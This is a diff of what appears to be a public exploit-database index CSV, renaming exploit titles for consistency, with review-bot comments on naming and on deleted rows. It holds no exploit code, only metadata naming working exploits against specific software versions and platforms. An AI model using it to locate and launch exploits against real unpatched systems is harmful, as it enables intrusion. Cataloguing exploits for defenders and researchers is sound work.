@@ -8261,7 +8278,7 @@ id,file,description,date,author,platform,type,port 23921,platforms/windows/local/23921.c,"Centrinity FirstClass Desktop Client 7.1 - Local Buffer Overflow",2004-04-07,I2S-LaB,windows,local,0 40400,platforms/windows/local/40400.txt,"SolarWinds Kiwi CatTools 3.11.0 - Unquoted Service Path Privilege Escalation",2016-09-19,"Halil Dalabasmaz",windows,local,0 23989,platforms/windows/local/23989.c,"Microsoft Windows NT 4.0/2000 - Local Descriptor Table Privilege Escalation (MS04-011)",2004-04-18,mslug@safechina.net,windows,local,0 -23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'",2013-01-09,"Debasish Mandal",windows,local,0 +23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - '.jpeg'File Memory Corruption / Arbitrary Code Execution",2013-01-09,"Debasish Mandal",windows,local,0 24014,platforms/windows/local/24014.bat,"Symantec Norton AntiVirus 2002 - Nested File Manual Scan Bypass",2004-04-17,"Bipin Gautam",windows,local,0 24015,platforms/bsd/local/24015.c,"BSD-Games 2.x - Mille Local Save Game File Name Buffer Overrun",2004-04-17,N4rK07IX,bsd,local,0 24027,platforms/linux/local/24027.txt,"UTempter 0.5.x - Multiple Local Vulnerabilities",2004-04-19,"Steve Grubb",linux,local,0 
@@ -8311,10 +8328,10 @@ id,file,description,date,author,platform,type,port 24863,platforms/windows/local/24863.html,"EastFTP 4.6.02 - ActiveX Control",2013-03-20,Dr_IDE,windows,local,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310/6.0.3410 - 'ScsiAccess.exe' Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24884,platforms/windows/local/24884.html,"LiquidXML Studio 2012 - ActiveX Insecure Method Executable File Creation",2013-03-25,Dr_IDE,windows,local,0 -24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Remote",2013-03-25,Dr_IDE,windows,local,0 +24885,platforms/windows/local/24885.html,"LiquidXML Studio 2010 - ActiveX Code Execution",2013-03-25,Dr_IDE,windows,local,0 24899,platforms/hardware/local/24899.txt,"Draytek Vigor 3900 1.06 - Privilege Escalation",2013-03-29,"Mohammad abou hayt",hardware,local,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 -24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Local",2013-04-07,"Matt Andreko",windows,local,0 +24919,platforms/windows/local/24919.py,"HexChat 2.9.4 - Overflow",2013-04-07,"Matt Andreko",windows,local,0 24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0 24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0 24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0 
@@ -8428,7 +8445,7 @@ id,file,description,date,author,platform,type,port 27609,platforms/windows/local/27609.rb,"Chasys Draw IES - Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,local,0 27766,platforms/linux/local/27766.txt,"Linux Kernel 2.6.x - SMBFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 27769,platforms/linux/local/27769.txt,"Linux Kernel 2.6.x - CIFS CHRoot Security Restriction Bypass",2006-04-28,"Marcel Holtmann",linux,local,0 -27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local",2013-08-26,"Ayman Sagy",windows,local,0 +27874,platforms/windows/local/27874.py,"Winamp 5.63 - 'winamp.ini' Local Overflow",2013-08-26,"Ayman Sagy",windows,local,0 27938,platforms/linux/local/27938.rb,"VMware - Setuid VMware-mount Unsafe popen(3) (Metasploit)",2013-08-29,Metasploit,linux,local,0 27944,platforms/osx/local/27944.rb,"Apple Mac OSX - Sudo Password Bypass (Metasploit)",2013-08-29,Metasploit,osx,local,0 27965,platforms/osx/local/27965.py,"Apple Mac OSX 10.8.4 - Privilege Escalation (Python)",2013-08-30,"David Kennedy (ReL1K)",osx,local,0 
@@ -8507,7 +8524,7 @@ id,file,description,date,author,platform,type,port 29822,platforms/linux/local/29822.c,"Man Command - -H Flag Local Buffer Overflow",2007-04-06,"Daniel Roethlisberger",linux,local,0 29881,platforms/windows/local/29881.txt,"Adobe Acrobat Reader - ASLR + DEP Bypass with Sandbox Bypass",2013-11-28,"w3bd3vil & abh1sek",windows,local,0 29922,platforms/windows/local/29922.py,"Kingsoft Office Writer 2012 8.1.0.3385 - '.wps' Buffer Overflow (SEH)",2013-11-30,"Julien Ahrens",windows,local,0 -29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Local",2007-05-04,poplix,osx,local,0 +29950,platforms/osx/local/29950.js,"Apple 2.0.4 - Safari Local Cross-Site Scripting",2007-05-04,poplix,osx,local,0 29954,platforms/linux/local/29954.txt,"ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution",2007-05-07,"Arnaud Giersch",linux,local,0 30007,platforms/windows/local/30007.txt,"Notepad++ Plugin Notepad 1.5 - Local Overflow",2013-12-03,"Junwen Sun",windows,local,0 30096,platforms/osx/local/30096.txt,"Apple Mac OSX 10.4.9 - VPND Local Format String",2007-05-29,"Chris Anley",osx,local,0 
@@ -8894,7 +8911,7 @@ id,file,description,date,author,platform,type,port 38600,platforms/windows/local/38600.py,"Sam Spade 1.14 - Crawl Website Buffer Overflow",2015-11-02,MandawCoder,windows,local,0 38601,platforms/windows/local/38601.py,"Sam Spade 1.14 - Scan Addresses Buffer Overflow",2015-11-02,VIKRAMADITYA,windows,local,0 38603,platforms/windows/local/38603.py,"TCPing 2.1.0 - Buffer Overflow",2015-11-02,hyp3rlinx,windows,local,0 -38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local",2015-11-03,"Vivek Mahajan",windows,local,0 +38609,platforms/windows/local/38609.py,"Gold MP4 Player - '.swf' Local Overflow",2015-11-03,"Vivek Mahajan",windows,local,0 38631,platforms/windows/local/38631.txt,"McAfee Data Loss Prevention - Multiple Information Disclosure Vulnerabilities",2013-06-24,"Jamie Ooi",windows,local,0 38668,platforms/windows/local/38668.c,"Cisco WebEx One-Click Client Password Encryption - Information Disclosure",2013-07-09,"Brad Antoniewicz",windows,local,0 38672,platforms/windows/local/38672.txt,"YardRadius - Multiple Local Format String Vulnerabilities",2013-06-30,"Hamid Zamani",windows,local,0 
@@ -9203,7 +9220,7 @@ id,file,description,date,author,platform,type,port 41754,platforms/hardware/local/41754.txt,"Intermec PM43 Industrial Printer - Privilege Escalation",2017-03-28,"Jean-Marie Bourbon",hardware,local,0 41760,platforms/linux/local/41760.txt,"Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation",2016-02-22,halfdog,linux,local,0 41761,platforms/linux/local/41761.txt,"AUFS (Ubuntu 15.10) - 'allow_userns' Fuse/Xattr User Namespaces Privilege Escalation",2016-02-19,halfdog,linux,local,0 -41762,platforms/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr Setgid Privilege Escalation",2016-11-22,halfdog,linux,local,0 +41762,platforms/linux/local/41762.txt,"Ubuntu 14.04/15.10 - User Namespace Overlayfs Xattr SetGID Privilege Escalation",2016-11-22,halfdog,linux,local,0 41763,platforms/linux/local/41763.txt,"Ubuntu 15.10 - 'USERNS ' Overlayfs Over Fuse Privilege Escalation",2016-11-22,halfdog,linux,local,0 41764,platforms/linux/local/41764.txt,"NTP - Privilege Escalation",2016-01-21,halfdog,linux,local,0 41765,platforms/linux/local/41765.txt,"Ubuntu 15.04 (Development) - 'Upstart' Logrotation Privilege Escalation",2015-03-12,halfdog,linux,local,0 
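Review bot: the 41762 change is only "Setgid" to "SetGID", but the adjacent 41763 context line keeps a stray space inside its quoted token ("'USERNS '"); the same cleanup pass should make it "'USERNS'". Nothing else in the hunk changes meaning.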
@@ -9265,7 +9282,7 @@ id,file,description,date,author,platform,type,port 42267,platforms/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,windows,local,0 42270,platforms/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",solaris_x86,local,0 42271,platforms/openbsd/local/42271.c,"OpenBSD - 'at Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",openbsd,local,0 -42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib Stack Clash'",2017-06-28,"Qualys Corporation",lin_x86,local,0 +42273,platforms/lin_x86/local/42273.c,"Linux Kernel - 'offset2lib' Stack Clash",2017-06-28,"Qualys Corporation",lin_x86,local,0 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 
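Review bot: the 42273 edit moves "Stack Clash" outside the quotes ("'offset2lib' Stack Clash"), but the surrounding Qualys rows 42271, 42274, 42275 and 42276 still quote it ("'at Stack Clash'", "'ldso_hwcap Stack Clash'", ...), so the hunk leaves the series inconsistent; apply the same quoting to all of them or to none. 42273 is also the only row in the group without a "Privilege Escalation" suffix; add it if 42273.c confirms that outcome.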
@@ -9338,16 +9355,16 @@ id,file,description,date,author,platform,type,port 43139,platforms/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local,0 43156,platforms/windows/local/43156.py,"VX Search 10.2.14 - 'Proxy' Buffer Overflow (SEH)",2017-11-16,wetw0rk,windows,local,0 43162,platforms/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",windows,local,0 -1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote",2003-03-23,kralor,windows,remote,80 +1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 -5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote",2003-04-03,"Marcin Wolak",windows,remote,139 +5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",windows,remote,139 7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0 10,platforms/multiple/remote/10.c,"Samba < 2.2.8 (Linux/BSD) - Remote Code Execution",2003-04-10,eSDee,multiple,remote,139 16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723 18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0 19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723 -20,platforms/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote",2003-04-25,"Haamed Gheibi",windows,remote,139 
+20,platforms/windows/remote/20.txt,"Microsoft Windows 2000/XP - SMB Authentication Remote Overflow",2003-04-25,"Haamed Gheibi",windows,remote,139 23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Overflow",2003-04-30,"Johnny Cyberpunk",windows,remote,554 24,platforms/linux/remote/24.c,"Sendmail 8.12.8 (BSD) - 'Prescan()' Remote Command Execution",2003-04-30,bysin,linux,remote,25 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0 
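Review bot: ids 1, 5 and 20 gain "Remote Overflow", but the 2 context line in the same hunk, "Microsoft IIS 5.0 - WebDAV Remote (PoC)", keeps the bare "Remote" wording this commit removes elsewhere; rename it in the same pass so the two WebDAV rows read consistently.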
@@ -9359,12 +9376,11 @@ id,file,description,date,author,platform,type,port 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) - Local File Inclusion / Remote Code Execution",2003-05-29,anonymous,linux,remote,80 36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Code Execution (2)",2003-06-01,alumni,windows,remote,80 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag (MS03-020)",2003-06-07,alumni,windows,remote,0 -38,platforms/linux/remote/38.pl,"Apache 2.0.45 - 'APR' Remote",2003-06-08,"Matthew Murphy",linux,remote,80 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 Build 0402 - Remote Format String",2003-06-11,ThreaT,windows,remote,25 43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9 RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21 -45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote",2003-06-23,Rave,windows,remote,80 +45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - 'DSR-ducky.c' Remote Overflow",2003-06-23,Rave,windows,remote,80 46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow",2003-06-27,B-r00t,linux,remote,25 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote (MS03-022)",2003-07-01,firew0rker,windows,remote,80 49,platforms/linux/remote/49.c,"eXtremail 1.5.x (Linux) - Remote Format Strings",2003-07-02,B-r00t,linux,remote,25 
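Review bot: the 38 row ("Apache 2.0.45 - 'APR' Remote") is deleted with no replacement in this hunk (-12,+11); the commit subject lists a new "Apache 2.0.45 - 'APR' Crash" entry, so please confirm the corresponding addition and the move of platforms/linux/remote/38.pl are in the same patch, otherwise the id disappears from the index. The 48 context line ("Microsoft Windows Media Services - Remote (MS03-022)") also still has the bare "Remote" form that the 45 edit corrects.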
@@ -9372,9 +9388,9 @@ id,file,description,date,author,platform,type,port 51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Code Execution (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21 55,platforms/linux/remote/55.c,"Samba 2.2.8 - Brute Force Method Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139 -56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote",2003-07-14,anonymous,windows,remote,80 +56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Overflow",2003-07-14,anonymous,windows,remote,80 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - 'TTYPROMPT in.telnet' Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0 -58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote",2003-07-17,"Carl Livitt",linux,remote,504 +58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Overflow",2003-07-17,"Carl Livitt",linux,remote,504 63,platforms/linux/remote/63.c,"miniSQL (mSQL) 1.3 - GID Remote Code Execution",2003-07-25,"the itch",linux,remote,1114 64,platforms/windows/remote/64.c,"Microsoft Windows - 'RPC DCOM' Remote Buffer Overflow",2003-07-25,Flashsky,windows,remote,135 66,platforms/windows/remote/66.c,"Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)",2003-07-26,"H D Moore",windows,remote,135 
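Review bot: 56 and 58 are given "Remote Overflow", but the 66 context line "Microsoft Windows XP/2000 - 'RPC DCOM' Remote (MS03-026)" keeps bare "Remote" while 64 directly above it already reads "'RPC DCOM' Remote Buffer Overflow"; normalise 66 to match.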
@@ -9408,13 +9424,13 @@ id,file,description,date,author,platform,type,port 109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135 110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0 -116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote",2003-11-04,xCrZx,windows,remote,515 +116,platforms/windows/remote/116.c,"NIPrint LPD-LPR Print Server 4.10 - Remote Overflow",2003-11-04,xCrZx,windows,remote,515 117,platforms/windows/remote/117.c,"Microsoft Windows XP/2000 - RPC Remote Non Exec Memory",2003-11-07,ins1der,windows,remote,135 119,platforms/windows/remote/119.c,"Microsoft Windows XP/2000 - Workstation Service Overflow (MS03-049)",2003-11-12,eEYe,windows,remote,0 121,platforms/windows/remote/121.c,"Microsoft FrontPage Server Extensions - 'fp30reg.dll' (MS03-051)",2003-11-13,Adik,windows,remote,80 123,platforms/windows/remote/123.c,"Microsoft Windows - Workstation Service WKSSVC Remote (MS03-049)",2003-11-14,snooq,windows,remote,0 -124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote",2003-11-19,"Peter Winter-Smith",windows,remote,80 -126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote",2003-11-20,xCrZx,linux,remote,80 +124,platforms/windows/remote/124.pl,"IA WebMail Server 3.x - 'iaregdll.dll 1.0.0.5' Remote Overflow",2003-11-19,"Peter Winter-Smith",windows,remote,80 +126,platforms/linux/remote/126.c,"Apache mod_gzip (with debug_mode) 1.2.26.1a - Remote Overflow",2003-11-20,xCrZx,linux,remote,80 127,platforms/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution (WebServer)",2003-11-22,nesumin,windows,remote,0 130,platforms/windows/remote/130.c,"Microsoft Windows XP - 
Workstation Service Remote (MS03-049)",2003-12-04,fiNis,windows,remote,0 132,platforms/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80 @@ -9423,7 +9439,7 @@ id,file,description,date,author,platform,type,port 136,platforms/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal",2003-12-18,kralor,windows,remote,80 139,platforms/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406 143,platforms/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote,0 -149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote",2004-01-27,lion,windows,remote,21 +149,platforms/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow",2004-01-27,lion,windows,remote,21 151,platforms/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote,0 155,platforms/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 156,platforms/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,windows,remote,8080 
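Review bot: in the @@ -9408 hunk, 116, 124 and 126 become "Remote Overflow" while 117 ("RPC Remote Non Exec Memory"), 123 ("Workstation Service WKSSVC Remote (MS03-049)") and 130 ("Workstation Service Remote (MS03-049)") keep the bare "Remote" form; 119 beside them already says "Workstation Service Overflow (MS03-049)", so the three MS03-049 descriptions should be aligned with it in the same pass.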
@@ -9448,7 +9464,7 @@ id,file,description,date,author,platform,type,port 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21 204,platforms/linux/remote/204.c,"BFTPd - 'vsprintf()' Format Strings",2000-11-29,DiGiT,linux,remote,21 -208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 +208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0 213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80 
@@ -9458,7 +9474,7 @@ id,file,description,date,author,platform,type,port 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass",2000-12-19,anonymous,windows,remote,0 -234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote",2000-12-20,Scrippie,bsd,remote,21 +234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Overflow",2000-12-20,Scrippie,bsd,remote,21 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP",2001-01-02,Stealth,linux,remote,513 239,platforms/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings",2001-01-03,kalou,solaris,remote,21 253,platforms/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,linux,remote,143 
@@ -9472,7 +9488,7 @@ id,file,description,date,author,platform,type,port 279,platforms/linux/remote/279.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 280,platforms/solaris/remote/280.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 282,platforms/linux/remote/282.c,"ISC BIND 8.2.x - 'TSIG' Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 -284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote",2001-03-03,SkyLaZarT,linux,remote,143 +284,platforms/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow",2001-03-03,SkyLaZarT,linux,remote,143 293,platforms/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 294,platforms/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000 295,platforms/windows/remote/295.c,"Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 
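Review bot: 284 is renamed to "'lsub' Remote Overflow", but the 295 context line "Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)" is left in the bare form while 293 directly above it reads "'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)"; the two Lsasrv rows should use the same wording.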
@@ -9481,7 +9497,7 @@ id,file,description,date,author,platform,type,port 300,platforms/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 301,platforms/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401 303,platforms/linux/remote/303.pl,"Borland Interbase 7.x - Remote Buffer Overflow",2004-06-25,"Aviram Jenik",linux,remote,3050 -304,platforms/linux/remote/304.c,"Subversion 1.0.2 - 'svn_time_from_cstring()' Remote",2004-06-25,"Gyan Chawdhary",linux,remote,3690 +304,platforms/linux/remote/304.c,"Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Overflow",2004-06-25,"Gyan Chawdhary",linux,remote,3690 307,platforms/linux/remote/307.py,"Rlpr 2.04 - 'msg()' Remote Format String",2004-06-25,jaguar,linux,remote,7290 308,platforms/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,linux,remote,0 310,platforms/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell",2004-07-09,Jelmer,windows,remote,0 
@@ -9497,7 +9513,7 @@ id,file,description,date,author,platform,type,port 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0 364,platforms/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 -372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote",2004-08-03,Andi,linux,remote,21 +372,platforms/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Overflow",2004-08-03,Andi,linux,remote,21 373,platforms/linux/remote/373.c,"OpenFTPd 0.30.1 - message system Remote Shell",2004-08-04,infamous41md,linux,remote,21 378,platforms/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 379,platforms/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote,0 
@@ -9509,12 +9525,11 @@ id,file,description,date,author,platform,type,port 390,platforms/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote,0 391,platforms/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548 392,platforms/linux/remote/392.c,"Remote CVS 1.11.15 - 'error_prog_name' Arbitrary Code Execution",2004-08-13,"Gyan Chawdhary",linux,remote,2401 -397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote",2002-06-25,Teso,linux,remote,143 +397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Overflow",2002-06-25,Teso,linux,remote,143 398,platforms/linux/remote/398.c,"rsync 2.5.1 - Remote (1)",2002-01-01,Teso,linux,remote,873 399,platforms/linux/remote/399.c,"rsync 2.5.1 - Remote (2)",2002-01-01,Teso,linux,remote,873 400,platforms/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote,0 404,platforms/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0 -405,platforms/linux/remote/405.c,"XV 3.x - '.BMP' Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0 409,platforms/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote,0 
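Review bot: the 405 deletion ("XV 3.x - '.BMP' Parsing Local Buffer Overflow", filed under platforms/linux/remote with type remote) has no counterpart in this hunk, and the header (-12,+11) shows it is removed outright; confirm the row is re-added under a local path with the file moved so the id is not lost. The 398 and 399 context lines ("rsync 2.5.1 - Remote (1)" / "(2)") also keep the bare "Remote" that 397 is being corrected away from.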
